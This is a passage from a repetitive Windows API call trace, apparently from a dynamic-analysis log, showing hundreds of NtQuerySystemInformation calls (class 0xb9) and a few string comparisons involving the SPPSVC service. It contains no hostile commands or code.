NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x20, ResultLength=0x0) [0208.081] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd0, Length=0x20, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd0, Length=0x20, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccd0, Length=0x20, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0208.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0208.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd460, Length=0x40, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd380, Length=0x30, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd288, Length=0x30, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1f0, Length=0x38, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0208.165] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfe0, Length=0x28, ResultLength=0x0) [0208.173] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd060, Length=0x50, ResultLength=0x0) [0208.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdc0, Length=0x28, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce30, Length=0x28, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0208.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x28, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd90, Length=0x20, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf90, Length=0x38, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfce10, Length=0x20, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x20, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x50, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x50, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd670, Length=0x50, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd560, Length=0x50, ResultLength=0x0) [0208.183] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd560, Length=0x50, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd560, Length=0x50, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd560, Length=0x50, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.184] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd490, Length=0x38, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x28, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x28, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x28, ResultLength=0x0) [0208.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x28, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd330, Length=0x28, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd490, Length=0x38, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.187] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x28, ResultLength=0x0) [0208.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3b0, Length=0x28, ResultLength=0x0) [0208.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd250, Length=0x20, ResultLength=0x0) [0208.189] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x20, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x20, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x20, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd490, Length=0x38, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd490, Length=0x38, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x20, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2a0, Length=0x20, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.190] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2a0, Length=0x20, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd608, Length=0x50, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd580, Length=0x28, ResultLength=0x0) [0208.191] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0208.191] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd608, Length=0x50, 